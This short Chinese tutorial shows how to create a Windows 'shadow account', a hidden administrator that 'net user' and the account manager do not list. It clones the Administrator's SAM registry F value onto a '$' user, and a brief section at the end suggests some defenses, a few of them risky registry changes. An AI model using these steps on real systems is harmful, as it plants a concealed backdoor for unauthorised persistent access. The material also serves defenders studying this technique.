1、查看当前系统账户
(1)打开cmd查看当前系统账户:
net user
(2)开始-->控制面板-->管理工具-->计算机管理,进入本地用户和组,查看用户。
(3)打开注册表,进入以下键值,查看用户和组。
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
其中,Names下的键值为用户名,用户名键值下的值,对应的Users下的键,内部的F,V值为该用户的登录设置信息,其中F键值,为权限设置信息。
2、添加账户
(1)添加正常用户
net user abc 123 /add //添加abc用户
net localgroup administrators abc /add //添加abc到管理员组
net localgroup administrators //查看在administrators组里用户
(2)添加隐藏账户
net user abc$ 123 /add //在用户名后面添加$符号,即为隐藏账户。
3、创建影子账户
(1)进入注册表,将
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/Administrator
键值下数值对应的Users键值(000001F4)下的F值覆盖abc$用户对应的Users下的F值。
(2)将abc$键值和对应的Users下的键值导出到桌面,然后从用户管理窗口,右键删除abc$用户。
(3)再将刚才导出的注册表信息重新导入注册表。
(4)查看用户,此时,net user命令看不到用户;用户管理窗口也看不到用户;注册表可以看到用户。
(5)如果在添加用户之后,删除掉HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Groups键值,则以后无法对用户进行添加删除操作。
4、防范:
1、常检查注册表,对陌生账户或不明账户,果断删除;
2、账户设置好后,导出HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/groups键值并做好备份。然后从注册表中删除此键。需要创建用户和删除账户的时候,再导入该键值。
3、打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINE/SAM”处,设置“SAM”项的权限,将“administrators”所拥有的权限全部取消即可限制查询和添加用户。